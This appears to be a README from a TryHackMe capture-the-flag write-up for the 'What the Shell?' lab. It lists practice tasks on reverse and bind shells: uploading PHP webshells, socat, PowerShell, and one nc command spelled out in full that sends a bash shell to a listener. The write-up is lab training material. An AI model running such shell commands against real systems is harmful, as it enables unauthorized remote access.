wolketich/THM-Writeup/What-The-Shell?/README.md

 - Try uploading a webshell to the Linux box, then use the command: nc <LOCAL-IP> <PORT> -e /bin/bash to send a reverse shell back to a waiting listener on your own machine.

 	  no answer needed
+- Navigate to /usr/share/webshells/php/php-reverse-shell.php in Kali and change the IP and port to match your tun0 IP with a custom port.
+Set up a netcat listener, then upload and activate the shell.

+	  no answer needed

+- Log into the Linux machine over SSH using the credentials in task 14.
+Use the techniques in Task 8 to experiment with bind and reverse netcat shells.

+	  no answer needed

+- Practice reverse and bind shells using Socat on the Linux machine.
+Try both the normal and special techniques.

+	  no answer needed

+- Look through Payloads all the Things and try some of the other reverse shell techniques.
+Try to analyse them and see why they work.

+	  no answer needed

+- Switch to the Windows VM.
+Try uploading and activating the php-reverse-shell.
+Does this work?

+	  no answer needed

+- Upload a webshell on the Windows target and try to obtain a reverse shell using Powershell.

+	  no answer needed